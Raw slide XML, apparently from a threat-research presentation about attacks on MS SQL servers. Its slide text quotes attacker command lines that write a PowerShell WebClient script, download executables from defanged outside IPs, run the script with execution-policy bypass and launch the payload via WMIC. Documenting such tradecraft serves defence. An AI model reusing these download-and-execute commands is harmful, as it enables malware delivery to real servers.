                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>://80[.]66.75]]]].40/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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXXX.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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, 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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xxxx.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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) &gt;&gt; %TEMP%\updt.ps1 &amp; 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powershell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-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ExecutionPolicy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Bypass %TEMP%\updt.ps1 &amp; WMIC process call create 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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXX.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="8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3C483FC-D6FF-79B4-49B3-9E7AF3926B28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9412357" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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4D193D91-3DDE-4D6E-52C7-1AA1AA3AE9EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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20" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD814A6D-7F53-A9AF-30A8-659C6C3412AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928226" y="2068146"/>
              <a:ext cx="7746993" cy="2551461"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1811382">
                <a:defRPr/>
              </a:pP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"\"C:\\Windows\\\\System32\\\\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cmd.exe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\" /C echo $cl = New-Object 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System.Net.WebClient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&gt; C:\Users\MSSQLS~1\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AppData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\Local\Temp\updt.ps1 &amp; echo $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cl.DownloadFile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(\"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hxxp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://80.66.75[.]36/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aRX.exe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\", \"C:\Users\MSSQLS~1\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AppData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\Local\Temp\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tzt.exe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\") &gt;&gt; %TEMP%\\updt.ps1 &amp; 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powershell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-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ExecutionPolicy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Bypass C:\Users\MSSQLS~1\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AppData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\Local\Temp\updt.ps1 &amp; WMIC process call create \"C:\Users\MSSQLS~1\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AppData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\Local\Temp\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tzt.exe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\""</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="8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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Graphic 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A591F0F-FCEF-C0BD-0293-776B3520E8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823503" y="5840056"/>
            <a:ext cx="2004062" cy="368563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E5E7761A-636B-6697-9A7B-E3258E0985F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322317" y="5808437"/>
            <a:ext cx="2286000" cy="4318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FFCDDAB-C3F8-2719-28E8-6A5C15D11B33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15182036" y="8708032"/>
            <a:ext cx="1095151" cy="485900"/>
            <a:chOff x="14607426" y="-166991"/>
            <a:chExt cx="1095151" cy="485900"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill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53EEDED2-EAE4-6BCD-D26E-6E7352865264}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14607426" y="-166991"/>
              <a:ext cx="1095151" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent3">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1371600"/>
              <a:endParaRPr lang="en-SK" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="IntelOne Display Regular"/>
                <a:cs typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE6097FB-67ED-3A71-85F0-6CF6211C3B41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14607426" y="-148733"/>
              <a:ext cx="1095151" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" err="1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tzt.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="20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14125F0-3963-7D3B-8BCB-66A63C0823A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8440083" y="4356196"/>
            <a:ext cx="1383420" cy="486665"/>
            <a:chOff x="14607426" y="-185476"/>
            <a:chExt cx="1383420" cy="486665"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill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D0387FE0-4717-7E87-FA52-E45C54804837}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14607426" y="-166991"/>
              <a:ext cx="1383420" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent3">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1371600"/>
              <a:endParaRPr lang="en-SK" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="IntelOne Display Regular"/>
                <a:cs typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{288929CD-B3EA-3E01-1414-3DDCDEFFDEDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14650615" y="-185476"/>
              <a:ext cx="1297042" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" err="1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tzt.bat</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="24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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Group 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A198153B-E046-2E0C-155E-875A4026021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3531901" y="352311"/>
            <a:ext cx="1205793" cy="1205793"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="4118889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="41" name="Group 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50806D0E-6F5F-8BE6-01D7-1233E88D8AC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4118889"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4118889"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C668A-81CB-463F-A357-228AE18F2A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Rectangle 161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A683408-4A22-AF01-DB95-1771C30360D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Rectangle 162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02AB51-D9A7-9D35-1B0A-F17501941121}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Rectangle 163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2CE5D8-F002-535C-E08B-03B0ABF9A7E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="48" name="Rectangle 164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660EB8AC-5E6F-1A68-30D3-1C26B5414452}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="44" name="Graphic 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403DCE12-6EC6-5323-7A1D-B911703FFF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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Oval 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD5AFDD-7C68-20A5-4F7B-0EB5F18A1FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1322317" y="702171"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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42287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945153-8292-1D5E-5E32-E07723550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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E0D44A8-C913-4233-0105-1BCC4E80F70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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29405D1A-EA25-7858-98CD-67932D5475E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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{848AA030-BCCD-80E2-2352-9D60195BCC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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A01828EA-BE83-7859-2C78-B3E5F398C7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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45D9A112-413B-49F0-CC05-68AB6C99DB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78127" y="-67586"/>
            <a:ext cx="13425772" cy="10189508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="122" name="Group 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C2C8D8-0C1B-507F-03F4-B7C630E01C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="1953783"/>
            <a:ext cx="16459200" cy="3185521"/>
            <a:chOff x="914400" y="2120365"/>
            <a:chExt cx="16459200" cy="3185521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81421EB-CE3B-28E2-2EB2-F5C8E52352AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="914400" y="2120365"/>
              <a:ext cx="16459200" cy="3185521"/>
              <a:chOff x="9783551" y="1103017"/>
              <a:chExt cx="16459200" cy="3185521"/>
            </a:xfrm>
          </p:grpSpPr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5F617EC6-9454-127C-78AC-A5EB01ECAC4F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9783551" y="1103017"/>
                <a:ext cx="16459200" cy="3185521"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 6307"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Graphic 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A430FB-1ED0-DEA4-8971-4066A28C16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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10126322" y="1300398"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBEE96AB-BD82-A9D6-7B94-1AEF9AEA7176}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9928226" y="1818602"/>
                <a:ext cx="16134415" cy="2395843"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pP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%SYSTEM%\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a: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”C:\Windows\\System32\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a: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” /C echo $cl = New-Object </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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System.Net.WebClient</a:t>
                </a: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&gt;C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; echo $</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cl.DownloadFile</a:t>
                </a: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(“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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hxxp</a:t>
                </a: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://80.66.75[.]47/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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Dxccaejs.exe</a:t>
                </a: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”, ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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tzt.bat</a:t>
                </a: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”) &gt;&gt; C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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powershell</a:t>
                </a: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–</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ExecutionPolicy</a:t>
                </a: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Bypass C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; WMIC process call create ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="65000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:effectLst/>
